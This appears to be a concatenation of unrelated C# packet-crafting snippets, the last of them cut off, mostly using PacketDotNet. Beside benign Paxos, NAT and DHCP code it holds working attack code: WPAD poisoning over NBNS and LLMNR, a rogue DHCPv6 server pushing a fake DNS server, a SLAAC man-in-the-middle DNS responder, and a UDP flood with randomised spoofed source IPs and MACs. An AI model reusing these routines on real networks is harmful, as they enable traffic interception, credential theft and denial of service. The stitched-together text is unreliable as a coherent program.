private void acceptor(ref UdpPacket udp_p, ref Paxos_Packet paxos_p)
{
switch (paxos_p.MsgType)
{
case ((ushort)Phase.Paxos_1A):
paxos_p.MsgType = (ushort)Phase.Paxos_1B;
paxos_p.Voted_Round = vrounds_register[paxos_p.Instance];
paxos_p.Value = value_register[paxos_p.Instance];
paxos_p.Accept_ID = datapath_id;
rounds_register[paxos_p.Instance] = paxos_p.Voted_Round;
udp_p.DestinationPort = Paxos.Learner_Port;
udp_p.UpdateUDPChecksum();
break;
case ((ushort)Phase.Paxos_2A):
paxos_p.MsgType = (ushort)Phase.Paxos_2B;
rounds_register[paxos_p.Instance] = paxos_p.Round;
vrounds_register[paxos_p.Instance] = paxos_p.Round;
value_register[paxos_p.Instance] = paxos_p.Value;
paxos_p.Accept_ID = datapath_id;
udp_p.DestinationPort = Paxos.Learner_Port;
udp_p.UpdateUDPChecksum();
break;
default:
throw (new Exception("Unknown Paxos phase"));
}
}
override public ForwardingDecision process_packet(int in_port, ref Packet packet)
{
if (packet is EthernetPacket &&
packet.Encapsulates(typeof(IPv4Packet), typeof(UdpPacket), typeof(Paxos_Packet)))
{
IpPacket ip_p = ((IpPacket)(packet.PayloadPacket));
UdpPacket udp_p = ((UdpPacket)(ip_p.PayloadPacket));
if (udp_p.DestinationPort == Paxos.Paxos_Coordinator_Port)
{
Paxos_Packet paxos_p = ((Paxos_Packet)(udp_p.PayloadPacket));
instance_register++;
paxos_p.Instance = instance_register;
udp_p.DestinationPort = Paxos.Paxos_Acceptor_Port;
udp_p.UpdateUDPChecksum(); // NOTE we could use "udp_p.Checksum = 0" to
// follows the P4 implementation,
// avoiding the (optional) UDP checksum.
// Same applies to instances of
// checksum-setting below.
}
}
// We assume that we receive from in_port and send to in_port+1.
// NOTE that we implicitly forward all non-Paxos packets onwards,
// unmmodified. The downstream processor then decides how to forward
// them along the network.
return(new ForwardingDecision.SinglePortForward(in_port + 1));
}
/// <summary>
/// Fires off on a seperate thread when a packet is available
/// </summary>
/// <param name="sender"></param>
/// <param name="e"></param>
private void ProcessPacket(RawCapture incoming)
{
try
{
Packet packet = Packet.ParsePacket(LinkLayers.Ethernet, incoming.Data);
EthernetPacket ethSrc = (EthernetPacket)packet.Extract(typeof(EthernetPacket));
IPv4Packet ipSrc = (IPv4Packet)packet.Extract(typeof(IPv4Packet));
if (ipSrc.Protocol == IPProtocolType.UDP)
{
UdpPacket udpSrc = (UdpPacket)packet.Extract(typeof(UdpPacket));
// From RFC 1002 Section 4.2.1.1
// Need to grab the transaction id for the reply
UInt16 namedTrnId = BitConverter.ToUInt16(udpSrc.PayloadData, 0);
// Looking for Response = query(0), OpCode = Query(0)
// 11000000 00000000
UInt16 flags = Utility.ReverseUInt16(BitConverter.ToUInt16(udpSrc.PayloadData, 2));
if ((flags & 0xc000) == 0)
{
// Grab the name and make sure it's WPAD
string name = Encoding.Default.GetString(udpSrc.PayloadData, 12, 34);
if (Utility.DecodeName(name) == WpadHostName)
{
Logger.AddToInfoView("Received NBNS query for {0} from {1}", WpadHostName, ethSrc.SourceHwAddress);
UdpPacket udpDst = new UdpPacket(NetbiosPort, NetbiosPort);
udpDst.PayloadData = SetupResponse(namedTrnId, GetDeviceIp(this.Device));
IPv4Packet ipDst = new IPv4Packet(GetDeviceIp(this.Device), ipSrc.SourceAddress);
ipDst.PayloadPacket = udpDst;
udpDst.UpdateCalculatedValues();
udpDst.UpdateUDPChecksum();
ipDst.UpdateCalculatedValues();
ipDst.UpdateIPChecksum();
EthernetPacket ethDst = new EthernetPacket(this.Device.MacAddress, ethSrc.SourceHwAddress, EthernetPacketType.IpV4);
ethDst.PayloadPacket = ipDst;
ethDst.UpdateCalculatedValues();
Logger.AddToInfoView("Sending poisoned response for {0}", WpadHostName);
this.Device.SendPacket(ethDst.Bytes);
}
}
}
else if (ipSrc.Protocol == IPProtocolType.TCP)
{
TcpPacket tcpSrc = (TcpPacket)packet.Extract(typeof(TcpPacket));
if (tcpSrc.Syn)
{
Logger.AddToInfoView("SYN sent {0}:{1}", ipSrc.DestinationAddress, tcpSrc.SourcePort);
}
}
}
catch (Exception ex)
{
Logger.AddToErrorView("OnPacketArrival", ex);
}
}
public static Packet BuildPacket(int vlanID, EthernetPacket ePacket, IPv4Packet iPacket, UdpPacket uPacket, byte[] udpData)
{
uPacket.PayloadData = udpData;
iPacket.PayloadPacket = uPacket;
iPacket.UpdateIPChecksum();
uPacket.UpdateUDPChecksum();
return(BuildPacket(vlanID, ePacket, iPacket));
}
public void GenerateLLMNRResponse(Packet packet)
{
try
{
LLMNR.LLMNRPacket llmnr = new LLMNR.LLMNRPacket();
llmnr.ParsePacket(((UdpPacket)(packet.PayloadPacket.PayloadPacket)).PayloadData);
if (llmnr.Query.Name.ToLower().Equals("wpad") && llmnr.Query.Type.Value == LLMNR.DNSType.A)
{
WinPcapDevice dev = Program.CurrentProject.data.GetDevice();
IPAddress ip = Program.CurrentProject.data.GetIPv4FromDevice(dev);
byte[] ipv4Addr = ip.GetAddressBytes();
llmnr.AnswerList.Add(new LLMNR.DNSAnswer()
{
Class = evilfoca.LLMNR.DNSClass.IN,
Name = llmnr.Query.Name,
Type = evilfoca.LLMNR.DNSType.A,
RData = ipv4Addr,
RDLength = (short)ipv4Addr.Length,
TTL = 12
});
llmnr.IsResponse = true;
EthernetPacket ethDns = new EthernetPacket(dev.MacAddress, ((EthernetPacket)packet).SourceHwAddress, EthernetPacketType.IpV4);
IPv4Packet ipv4Dns = new IPv4Packet(ip, ((IPv4Packet)((EthernetPacket)packet).PayloadPacket).SourceAddress);
UdpPacket udpDns = new UdpPacket(((UdpPacket)(packet.PayloadPacket.PayloadPacket)).DestinationPort, ((UdpPacket)(packet.PayloadPacket.PayloadPacket)).SourcePort);
udpDns.PayloadData = llmnr.BuildPacket();
ipv4Dns.PayloadPacket = udpDns;
udpDns.UpdateCalculatedValues();
udpDns.UpdateUDPChecksum();
ipv4Dns.UpdateIPChecksum();
ipv4Dns.UpdateCalculatedValues();
ethDns.PayloadPacket = ipv4Dns;
Program.CurrentProject.data.SendPacket(ethDns);
}
}
catch (Exception)
{
}
}
public Packet GetSendPacket(PhysicalAddress sourceMAC, IPAddress sourceIPAddress)
{
// EthernetPacket ePacket = new EthernetPacket(PhysicalAddress.Parse("00-E0-4C-68-02-91"), PhysicalAddress.Parse("33-33-00-01-00-02"), EthernetPacketType.IpV6);
// IPv6Packet ipPacket = new IPv6Packet(IPAddress.Parse("fe80::1c66:e750:c259:df88"), IPAddress.Parse("ff02::1:2"));
EthernetPacket ePacket = new EthernetPacket(sourceMAC, PhysicalAddress.Parse("33-33-00-01-00-02"), EthernetPacketType.IpV6);
IPv6Packet ipPacket = new IPv6Packet(sourceIPAddress, IPAddress.Parse("ff02::1:2"));
ePacket.PayloadPacket = ipPacket;
UdpPacket udpPacket = new UdpPacket(SOURCE_PORT, DEST_PORT);
udpPacket.PayloadData = AddOtherOptions(DhcpV6MessagePacket).Encode().getAllBytes();
udpPacket.UpdateCalculatedValues();
ipPacket.PayloadPacket = udpPacket;
udpPacket.UpdateUDPChecksum();
Console.WriteLine("Send Type({0}) transactionID:{1:X} ", DhcpV6MessagePacket.GetMessageType().ToString(), DhcpV6MessagePacket.GetTransactionId());
return(ePacket);
}
private void processUdpFlood(Object Params)
{
AttackParams _params = Params as AttackParams;
if (_params.UdpFloodEnabled)
{
NetworkInstruments.IpRandomizer IpSpoofer = new NetworkInstruments.IpRandomizer();
PhysicalAddress TargetMac = NetworkInstruments.ResolveMac(Adapter, _params.Target.Address);
ICaptureDevice ActiveDevice = NetworkInstruments.getActiveDevice(Adapter.GetPhysicalAddress());
ActiveDevice.Open();
UdpPacket udpPacket = new UdpPacket(0, 80);
IPv4Packet ipPacket = new IPv4Packet(IPAddress.Any, _params.Target.Address);
ipPacket.Protocol = IPProtocolType.UDP;
ipPacket.PayloadPacket = udpPacket;
if (TargetMac == null)
{
ErrorHandler(1, "Can not get MAC target address");
return;
}
; //unable to resolve mac
EthernetPacket ethernetPacket = new EthernetPacket(Adapter.GetPhysicalAddress(), TargetMac, EthernetPacketType.None);
ethernetPacket.PayloadPacket = ipPacket;
while (Attacking)
{
udpPacket.SourcePort = (ushort)Randomizer.Next(1, 49160);
udpPacket.DestinationPort = (ushort)Randomizer.Next(1, 49160);
udpPacket.PayloadData = new byte[Randomizer.Next(500)];
Randomizer.NextBytes(udpPacket.PayloadData);
udpPacket.UpdateCalculatedValues();
ipPacket.SourceAddress = IpSpoofer.GetNext(ref Randomizer, _params.RestrictedPool);
ipPacket.TimeToLive = Randomizer.Next(20, 128);
ipPacket.UpdateCalculatedValues();
ipPacket.UpdateIPChecksum();
ethernetPacket.SourceHwAddress = NetworkInstruments.GetRandomMac(ref Randomizer);
ethernetPacket.UpdateCalculatedValues();
udpPacket.UpdateUDPChecksum();
ActiveDevice.SendPacket(ethernetPacket);
udpCounter++;
}
}
}
// IPv4 + UDP数据包封装函数
private EthernetPacket UdPonIPv4PacketMaker()
{
// Ether封包
var ether = new EthernetPacket(PhysicalAddress.Parse(MakeMaCaddr(SourceMAC1.Text, SourceMAC2.Text, SourceMAC3.Text, SourceMAC4.Text, SourceMAC5.Text, SourceMAC6.Text)),
PhysicalAddress.Parse(MakeMaCaddr(DestMAC1.Text, DestMAC2.Text, DestMAC3.Text, DestMAC4.Text, DestMAC5.Text, DestMAC6.Text)),
EthernetPacketType.IPv4);
// UDP封包
var udp = new UdpPacket(Convert.ToUInt16(SourcePortTextBox.Text), Convert.ToUInt16(DestPortTextBox.Text));
if (PayloadTextBox.Text.Length != 0)
{
udp.PayloadData = Encoding.ASCII.GetBytes(PayloadTextBox.Text);
}
udp.UpdateCalculatedValues();
// IPv4封包
var IPv4 = new IPv4Packet(IPAddress.Parse(MakeIPaddr(SourceIP1.Text, SourceIP2.Text, SourceIP3.Text, SourceIP4.Text)),
IPAddress.Parse(MakeIPaddr(DestIP1.Text, DestIP2.Text, DestIP3.Text, DestIP4.Text)))
{
TimeToLive = Convert.ToInt32(TTLTextBox.Text),
Protocol = IPProtocolType.UDP,
Version = IPVersion.IPv4,
FragmentFlags = Convert.ToInt16(FragmentFlagsTextBox.Text),
FragmentOffset = Convert.ToInt32(FragmentOffsetTextBox.Text),
TypeOfService = Convert.ToInt32(TOSTextBox.Text),
Id = Convert.ToUInt16(IdentifierTextbox.Text),
PayloadPacket = udp
};
ether.PayloadPacket = IPv4;
IPv4.ParentPacket = ether;
IPv4.UpdateIPChecksum();
udp.ParentPacket = IPv4;
udp.UpdateUDPChecksum();
return(ether);
}
private void SendRequest()
{
try
{
m_IStatusUpdate.UpdateStatus("Assembling DHCP Request Packet");
DHCPRequest DhcpRequest = new DHCPRequest();
AssembleRequest(ref DhcpRequest);
string destHwAddress = "FFFFFFFFFFFF";
var dest = System.Net.NetworkInformation.PhysicalAddress.Parse(destHwAddress);
EthernetPacket packet = new EthernetPacket(m_Device.Interface.MacAddress, dest, EthernetPacketType.IpV4);
packet.Type = EthernetPacketType.IpV4;
var ipSourceAddress = System.Net.IPAddress.Parse("0.0.0.0");
var ipDestinationAddress = System.Net.IPAddress.Parse("255.255.255.255");
var ipPacket = new IPv4Packet(ipSourceAddress, ipDestinationAddress);
UdpPacket udpPacket = new UdpPacket(67, 68);
byte[] payload = StructureToByteArray(DhcpRequest);
ipPacket.Version = IpVersion.IPv4;
udpPacket.PayloadData = payload;
ipPacket.PayloadPacket = udpPacket;
packet.PayloadPacket = ipPacket;
udpPacket.UpdateUDPChecksum();
ipPacket.UpdateIPChecksum();
m_IStatusUpdate.UpdateStatus("Sending DHCP Discover");
m_Device.SendPacket(packet);
m_IStatusUpdate.UpdateStatus("Sent DHCP Discover");
}
catch (Exception)
{
m_IStatusUpdate.UpdateStatus("Failed to send DHCP Request");
}
}
/*
* public EthernetPacketType deNAT_outgoing_packet(ref byte[] data, PhysicalAddress dstMAC, PhysicalAddress srcMAC)
* {
* EthernetPacketType ethernet_packet_type = getEthernetPacketType(ref data);
* if (!isIpOrArpPacket(ethernet_packet_type))
* return ethernet_packet_type;
* xbs_nat_entry nat_entry = null;
* lock (NAT_list)
* {
* if (NAT_list.ContainsKey(dstMAC))
* nat_entry = NAT_list[dstMAC];
* }
*
* if (nat_entry != null)
* {
* replaceDestinationIpWithOriginalIP(ref data, ethernet_packet_type, ref nat_entry);
* updateIPChecksums(ref data);
* }
* return ethernet_packet_type;
* }
*/
public EthernetPacketType deNAT_outgoing_packet_PacketDotNet(ref byte[] data, PhysicalAddress dstMAC, PhysicalAddress srcMAC)
{
EthernetPacket p = (EthernetPacket)EthernetPacket.ParsePacket(LinkLayers.Ethernet, data);
EthernetPacketType ethernet_packet_type = getEthernetPacketType(ref data);
IPv4Packet p_IPV4 = null;
ARPPacket p_ARP = null;
bool packet_changed = false;
if (ethernet_packet_type == EthernetPacketType.IpV4)
{
p_IPV4 = (IPv4Packet)p.PayloadPacket;
}
else if (ethernet_packet_type == EthernetPacketType.Arp)
{
p_ARP = (ARPPacket)p.PayloadPacket;
}
else
{
return(ethernet_packet_type);
}
xbs_nat_entry nat_entry = null;
lock (NAT_list)
{
if (dstMAC.Equals(broadcast_mac))
{
if (p_ARP != null)
{
foreach (xbs_nat_entry ne in NAT_list.Values)
{
if (ne.natted_source_ip.Equals(p_ARP.TargetProtocolAddress))
{
nat_entry = ne;
break;
}
}
}
}
else if (NAT_list.ContainsKey(dstMAC))
{
nat_entry = NAT_list[dstMAC];
}
}
#if DEBUG
if (nat_entry != null)
{
xbs_messages.addDebugMessage("% found device in deNAT list: " + dstMAC + " " + nat_entry.natted_source_ip + "=>" + nat_entry.original_source_ip, xbs_message_sender.NAT);
}
#endif
if (nat_entry != null)
{
if (p_IPV4 != null)
{
p_IPV4.DestinationAddress = nat_entry.original_source_ip;
p_IPV4.UpdateIPChecksum();
if (p_IPV4.Protocol == IPProtocolType.UDP)
{
UdpPacket p_UDP = (UdpPacket)p_IPV4.PayloadPacket;
if (NAT_enablePS3mode)
{
bool ret = PS3_replaceClientAnswer_hostAddr(dstMAC, ref p_UDP, nat_entry.original_source_ip, nat_entry.natted_source_ip);
}
p_UDP.UpdateUDPChecksum();
packet_changed = true;
}
else if (p_IPV4.Protocol == IPProtocolType.TCP)
{
((TcpPacket)p_IPV4.PayloadPacket).UpdateTCPChecksum();
packet_changed = true;
}
}
else if (p_ARP != null)
{
p_ARP.TargetProtocolAddress = nat_entry.original_source_ip;
packet_changed = true;
}
}
if (packet_changed)
{
data = p.BytesHighPerformance.ActualBytes();
}
return((packet_changed) ? ethernet_packet_type : EthernetPacketType.None);
}
/*
* public EthernetPacketType NAT_incoming_packet(ref byte[] data, PhysicalAddress dstMAC, PhysicalAddress srcMAC)
* {
* EthernetPacketType ethernet_packet_type = getEthernetPacketType(ref data);
* if (!isIpOrArpPacket(ethernet_packet_type))
* return ethernet_packet_type;
* xbs_nat_entry nat_entry;
* lock (NAT_list)
* {
* if (!NAT_list.TryGetValue(srcMAC, out nat_entry))
* {
* IPAddress sourceIP = getSourceIPFromRawPacketData(ref data, ethernet_packet_type);
* if (sourceIP.Equals(ip_zero))
* return ethernet_packet_type;
* IPAddress destinationIP = getDestinationIPFromRawPacketData(ref data, ethernet_packet_type);
* nat_entry = ip_pool.requestIP( sourceIP, srcMAC );
* if (nat_entry == null)
* {
* xbs_messages.addInfoMessage("!! % out of NAT IPs. Could not nat incoming packet");
* return ethernet_packet_type;
* }
* NAT_list.Add(srcMAC, nat_entry);
#if DEBUG
* xbs_messages.addDebugMessage("% new device in NAT list: " + srcMAC + " " + nat_entry.original_source_ip + "=>" + nat_entry.natted_source_ip);
#endif
* }
* else
* {
#if DEBUG
* xbs_messages.addDebugMessage("% found device in NAT list: " + srcMAC + " " + nat_entry.original_source_ip + "=>" + nat_entry.natted_source_ip);
#endif
* }
* }
* replaceSourceIpWithNATSourceIP(ref data, ethernet_packet_type, ref nat_entry);
* if (ethernet_packet_type == EthernetPacketType.IpV4)
* {
* if (dstMAC.Equals(broadcast_mac) && nat_entry.natted_broadcast!=null)
* replaceBroadcastIPAddress(ref data, ref nat_entry.natted_broadcast_bytes);
* updateIPChecksums(ref data);
* }
* return ethernet_packet_type;
* }
*/
public EthernetPacketType NAT_incoming_packet_PacketDotNet(ref byte[] data, PhysicalAddress dstMAC, PhysicalAddress srcMAC, ref Packet p, ref IPv4Packet p_IPV4, ref ARPPacket p_ARP)
{
xbs_nat_entry nat_entry;
EthernetPacketType p_type = ((EthernetPacket)p).Type;
if (p_type != EthernetPacketType.IpV4 && p_type != EthernetPacketType.Arp)
{
return(p_type);
}
lock (NAT_list)
{
if (!NAT_list.TryGetValue(srcMAC, out nat_entry))
{
IPAddress sourceIP = (p_IPV4 != null) ? p_IPV4.SourceAddress : p_ARP.SenderProtocolAddress;
if (sourceIP.Equals(ip_zero))
{
return(p_type);
}
IPAddress destinationIP = (p_IPV4 != null) ? p_IPV4.DestinationAddress : p_ARP.TargetProtocolAddress;
nat_entry = ip_pool.requestIP(sourceIP, srcMAC);
if (nat_entry == null)
{
if (!natIPpoolOverflow_warning_shown)
{
natIPpoolOverflow_warning_shown = true;
xbs_messages.addInfoMessage("!! % out of NAT IPs. Could not NAT incoming packet", xbs_message_sender.NAT, xbs_message_type.WARNING);
}
return(p_type);
}
else
{
natIPpoolOverflow_warning_shown = false;
NAT_list.Add(srcMAC, nat_entry);
#if DEBUG
xbs_messages.addDebugMessage("% new device in NAT list: " + srcMAC + " " + nat_entry.original_source_ip + "=>" + nat_entry.natted_source_ip, xbs_message_sender.NAT);
#endif
}
}
else
{
#if DEBUG
xbs_messages.addDebugMessage("% found device in NAT list: " + srcMAC + " " + nat_entry.original_source_ip + "=>" + nat_entry.natted_source_ip, xbs_message_sender.NAT);
#endif
}
}
if (p_IPV4 != null)
{
p_IPV4.SourceAddress = nat_entry.natted_source_ip;
if (dstMAC.Equals(broadcast_mac) && nat_entry.natted_broadcast != null)
{
p_IPV4.DestinationAddress = nat_entry.natted_broadcast;
}
p_IPV4.UpdateIPChecksum();
if (p_IPV4.Protocol == IPProtocolType.UDP)
{
UdpPacket p_UDP = (UdpPacket)p_IPV4.PayloadPacket;
if (NAT_enablePS3mode)
{
bool ret = PS3_replaceInfoResponse_hostAddr(dstMAC, ref p_UDP, nat_entry.natted_source_ip);
if (!ret)
{
ret = PS3_replaceClientAnswer_hostAddr(dstMAC, ref p_UDP, nat_entry.natted_source_ip, nat_entry.original_source_ip);
}
}
p_UDP.UpdateUDPChecksum();
}
else if (p_IPV4.Protocol == IPProtocolType.TCP)
{
((TcpPacket)p_IPV4.PayloadPacket).UpdateTCPChecksum();
}
}
else
{
p_ARP.SenderProtocolAddress = nat_entry.natted_source_ip;
}
data = p.BytesHighPerformance.ActualBytes();
return(p_type);
}
unsafe public void AnalyzePacket(WinPcapDevice device, Packet p)
{
if (p.PayloadPacket == null || p.PayloadPacket.PayloadPacket == null || !(p.PayloadPacket.PayloadPacket is UdpPacket))
{
return;
}
UdpPacket udp = (UdpPacket)p.PayloadPacket.PayloadPacket;
if (udp.ParentPacket == null)
{
return;
}
if (!(udp.ParentPacket is IPv6Packet))
{
return;
}
if (attacks.Where(A => A.attackType == AttackType.DHCPIpv6).Count() == 0)
{
return;
}
DhcpIPv6 attack = (DhcpIPv6)attacks.Where(A => A.attackType == AttackType.DHCPIpv6).First();
IPv6Packet packetIpLayer = (IPv6Packet)udp.ParentPacket;
EthernetPacket ethernet = (EthernetPacket)p;
/*
* Info: http://en.wikipedia.org/wiki/DHCPv6
* Example
* In this example, the server's link-local address is fe80::0011:22ff:fe33:5566/64 and the client's link-local address is fe80::aabb:ccff:fedd:eeff/64.
* DHCPv6 client sends a Solicit from [fe80::aabb:ccff:fedd:eeff]:546 for [ff02::1:2]:547.
* DHCPv6 server replies with an Advertise from [fe80::0011:22ff:fe33:5566]:547 for [fe80::aabb:ccff:fedd:eeff]:546.
* DHCPv6 client replies with a Request from [fe80::aabb:ccff:fedd:eeff]:546 for [ff02::1:2]:547. (All client messages are sent to the multicast address, per section 13 of RFC 3315.)
* DHCPv6 server finishes with a Reply from [fe80::0011:22ff:fe33:5566]:547 for [fe80::aabb:ccff:fedd:eeff]:546.
*/
DHCPv6Packet pa = new DHCPv6Packet();
pa.ParsePacket(udp.PayloadData);
if (packetIpLayer.DestinationAddress.Equals(IPAddress.Parse("ff02::1:2")))
{
EthernetPacket newPEthernet = new EthernetPacket(device.Interface.MacAddress,
ethernet.SourceHwAddress,
EthernetPacketType.IpV6);
UdpPacket newUDP = null;
IPAddress ipv6LocalLink = null;
IPv6Packet newIpv6 = null;
switch (pa.MessageType)
{
case DHCPv6Type.Solicit:
if (pa.Options.ContainsKey(DHCPv6OptionCode.ClientIdentifier) && pa.Options.ContainsKey(DHCPv6OptionCode.IANA))
{
newUDP = new UdpPacket(547, 546);
byte[] iaid = pa.Options[DHCPv6OptionCode.IANA].Value;
pa.MessageType = DHCPv6Type.Advertise;
pa.Options.Remove(DHCPv6OptionCode.ElapsedTime);
pa.Options.Remove(DHCPv6OptionCode.FQDM);
pa.Options.Remove(DHCPv6OptionCode.VendorClass);
pa.Options.Remove(DHCPv6OptionCode.OptionRequest);
pa.Options.Remove(DHCPv6OptionCode.IANA);
pa.AddServerIdentifierOption(device.MacAddress);
pa.AddIANAOption(IPAddress.Parse(string.Format("{0}:{1}", attack.fakeIPRange.ToString().Substring(0, attack.fakeIPRange.ToString().LastIndexOf(':')), IpID)), iaid);
pa.AddDNSOption(attack.fakeDns);
pa.AddDomainSearchListOption(new string[] { "google.com" });
IpID++;
newUDP.PayloadData = pa.BuildPacket();
ipv6LocalLink = IPAddress.Parse(Program.CurrentProject.data.GetIPv6LocalLinkFromDevice(device).ToString());
newIpv6 = new IPv6Packet(ipv6LocalLink, packetIpLayer.SourceAddress);
newIpv6.HopLimit = 1;
newIpv6.PayloadPacket = newUDP;
newPEthernet.PayloadPacket = newIpv6;
newUDP.UpdateCalculatedValues();
newUDP.UpdateUDPChecksum();
Program.CurrentProject.data.SendPacket(newPEthernet);
}
break;
case DHCPv6Type.Request:
newUDP = new UdpPacket(547, 546);
pa.MessageType = DHCPv6Type.Reply;
pa.Options.Remove(DHCPv6OptionCode.ElapsedTime);
pa.Options.Remove(DHCPv6OptionCode.FQDM);
pa.Options.Remove(DHCPv6OptionCode.VendorClass);
pa.Options.Remove(DHCPv6OptionCode.OptionRequest);
pa.Options.Remove(DHCPv6OptionCode.DNS);
pa.AddDNSOption(attack.fakeDns);
pa.AddDomainSearchListOption(new string[] { "google.com" });
newUDP.PayloadData = pa.BuildPacket();
ipv6LocalLink = IPAddress.Parse(Program.CurrentProject.data.GetIPv6LocalLinkFromDevice(device).ToString());
newIpv6 = new IPv6Packet(ipv6LocalLink, packetIpLayer.SourceAddress);
newIpv6.HopLimit = 1;
newIpv6.PayloadPacket = newUDP;
newPEthernet.PayloadPacket = newIpv6;
newUDP.UpdateCalculatedValues();
newUDP.UpdateUDPChecksum();
Program.CurrentProject.data.SendPacket(newPEthernet);
break;
case DHCPv6Type.InformationRequest:
newUDP = new UdpPacket(547, 546);
pa.MessageType = DHCPv6Type.Reply;
pa.Options.Remove(DHCPv6OptionCode.ElapsedTime);
pa.Options.Remove(DHCPv6OptionCode.FQDM);
pa.Options.Remove(DHCPv6OptionCode.VendorClass);
pa.Options.Remove(DHCPv6OptionCode.OptionRequest);
pa.Options.Remove(DHCPv6OptionCode.IANA);
pa.AddServerIdentifierOption(device.MacAddress);
pa.AddDNSOption(attack.fakeDns);
pa.AddDomainSearchListOption(new string[] { "google.com" });
newUDP.PayloadData = pa.BuildPacket();
ipv6LocalLink = IPAddress.Parse(Program.CurrentProject.data.GetIPv6LocalLinkFromDevice(device).ToString());
newIpv6 = new IPv6Packet(ipv6LocalLink, packetIpLayer.SourceAddress);
newIpv6.HopLimit = 1;
newIpv6.PayloadPacket = newUDP;
newPEthernet.PayloadPacket = newIpv6;
newUDP.UpdateCalculatedValues();
newUDP.UpdateUDPChecksum();
Program.CurrentProject.data.SendPacket(newPEthernet);
break;
default:
break;
}
}
}
private void DNSCheck(Packet p)
{
EthernetPacket ethernet = (EthernetPacket)p;
if (p.PayloadPacket.PayloadPacket is UdpPacket)
{
UdpPacket udp = p.PayloadPacket.PayloadPacket as UdpPacket;
attacks.Where(a => a.attackType == AttackType.SlaacMitm).ToList().ForEach(currentAttack =>
{
MitmAttack mitmAttack = currentAttack as MitmAttack;
if (p.PayloadPacket is IPv6Packet)
{
switch (udp.DestinationPort)
{
case 53:
Heijden.DNS.Response response = new Heijden.DNS.Response(new IPEndPoint(IPAddress.Parse("1.2.3.4"), 53), udp.PayloadData);
var aaaaDns = (from q in response.Questions
where q.QType == Heijden.DNS.QType.AAAA || q.QType == Heijden.DNS.QType.A
select q).ToList();
//Para mostrar la pelotita de conexión a internet OK, respondemos al paquete Teredo de Microsoft en formato A.
var aTeredoDns = (from q in response.Questions
where q.QType == Heijden.DNS.QType.A &&
(q.QName.ToLower().Contains("teredo") || q.QName.ToLower().Contains("msftncsi"))
select q).ToList();
if (aaaaDns != null && aaaaDns.Count > 0)
{
DNS.IPv6Query query = new DNS.IPv6Query(udp.PayloadData);
string q = query.name;
IPAddress[] ips = Dns.GetHostAddresses(q);
DNS.IPv6Response resp = new DNS.IPv6Response(DNS.IPv6Query.Type.Ipv6, query.transID, query.nameDnsFormat, ips[0]);
byte[] respByteAr = resp.GeneratePacket();
EthernetPacket ethDns = new EthernetPacket(localPhysicalAddress, ethernet.SourceHwAddress, EthernetPacketType.IpV4);
IPv6Packet ipv6Dns = new IPv6Packet(((IPv6Packet)p.PayloadPacket).DestinationAddress, ((IPv6Packet)p.PayloadPacket).SourceAddress);
UdpPacket udpDns = new UdpPacket(udp.DestinationPort, udp.SourcePort);
udpDns.PayloadData = respByteAr;
ipv6Dns.PayloadPacket = udpDns;
ethDns.PayloadPacket = ipv6Dns;
udpDns.UpdateCalculatedValues();
udpDns.UpdateUDPChecksum();
ipv6Dns.UpdateCalculatedValues();
Program.CurrentProject.data.SendPacket(ethDns);
}
else if (aTeredoDns != null && aTeredoDns.Count > 0)
{
DNS.IPv6Query query = new DNS.IPv6Query(udp.PayloadData);
string q = query.name;
IPAddress[] ips = Dns.GetHostAddresses(q);
DNS.IPv6Response resp = new DNS.IPv6Response(DNS.IPv6Query.Type.Ipv4, query.transID, query.nameDnsFormat, ips[0]);
byte[] respByteAr = resp.GeneratePacket();
EthernetPacket ethDns = new EthernetPacket(localPhysicalAddress, ethernet.SourceHwAddress, EthernetPacketType.IpV4);
IPv6Packet ipv6Dns = new IPv6Packet(((IPv6Packet)p.PayloadPacket).DestinationAddress, ((IPv6Packet)p.PayloadPacket).SourceAddress);
UdpPacket udpDns = new UdpPacket(udp.DestinationPort, udp.SourcePort);
udpDns.PayloadData = respByteAr;
ipv6Dns.PayloadPacket = udpDns;
ethDns.PayloadPacket = ipv6Dns;
udpDns.UpdateCalculatedValues();
udpDns.UpdateUDPChecksum();
ipv6Dns.UpdateCalculatedValues();
Program.CurrentProject.data.SendPacket(ethDns);
}
break;
case 5355:
LLMNR.LLMNRPacket llmnr = new LLMNR.LLMNRPacket();
llmnr.ParsePacket(udp.PayloadData);
if (llmnr.Query.Type.HasValue && llmnr.Query.Type.Value == LLMNR.DNSType.AAAA)
{
IPAddress[] ips = (from ip in Dns.GetHostAddresses(llmnr.Query.Name)
where ip.AddressFamily == System.Net.Sockets.AddressFamily.InterNetwork
select ip).ToArray();
byte[] ipv6Addr = new byte[] { 0x00, 0x64, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0xff,
(byte)ips[0].GetAddressBytes()[0], (byte)ips[0].GetAddressBytes()[1],
(byte)ips[0].GetAddressBytes()[2], (byte)ips[0].GetAddressBytes()[3] };
llmnr.AnswerList.Add(new LLMNR.DNSAnswer()
{
Class = evilfoca.LLMNR.DNSClass.IN,
Name = llmnr.Query.Name,
Type = evilfoca.LLMNR.DNSType.AAAA,
RData = ipv6Addr,
RDLength = (short)ipv6Addr.Length
});
EthernetPacket ethDns = new EthernetPacket(localPhysicalAddress, ethernet.SourceHwAddress, EthernetPacketType.IpV4);
IPv6Packet ipv6Dns = new IPv6Packet(((IPv6Packet)p.PayloadPacket).DestinationAddress, ((IPv6Packet)p.PayloadPacket).SourceAddress);
UdpPacket udpDns = new UdpPacket(udp.DestinationPort, udp.SourcePort);
udpDns.PayloadData = llmnr.BuildPacket();
ipv6Dns.PayloadPacket = udpDns;
ethDns.PayloadPacket = ipv6Dns;
udpDns.UpdateCalculatedValues();
udpDns.UpdateUDPChecksum();
ipv6Dns.UpdateCalculatedValues();
Program.CurrentProject.data.SendPacket(ethDns);
}
break;
default:
break;
}
}
});
}
}
public static Packet CreatePacket(Param param)
{
Packet ret = null;
//create layer 4
if (param.packetType == Param.PacketType.TCP)
{
TcpPacket tcpPacket = new TcpPacket(param.sPort, param.dPort);
tcpPacket.AllFlags = param.tcpFlag;
if (param.dIP.ToString().Contains("."))
{
IPv4Packet ipPacket = new IPv4Packet(param.sIP, param.dIP);
if (param.IPv4Frag) { ipPacket.FragmentFlags = (int)1; }
ret = new EthernetPacket(param.sMAC, param.dMAC, EthernetPacketType.IpV4);
ipPacket.PayloadPacket = tcpPacket;
tcpPacket.PayloadData = param.payload;
ret.PayloadPacket = ipPacket;
ipPacket.UpdateCalculatedValues();
ipPacket.UpdateIPChecksum();
tcpPacket.Checksum = (ushort)tcpPacket.CalculateTCPChecksum();
}
else
{
IPv6Packet ipPacket = new IPv6Packet(param.sIP, param.dIP);
ret = new EthernetPacket(param.sMAC, param.dMAC, EthernetPacketType.IpV6);
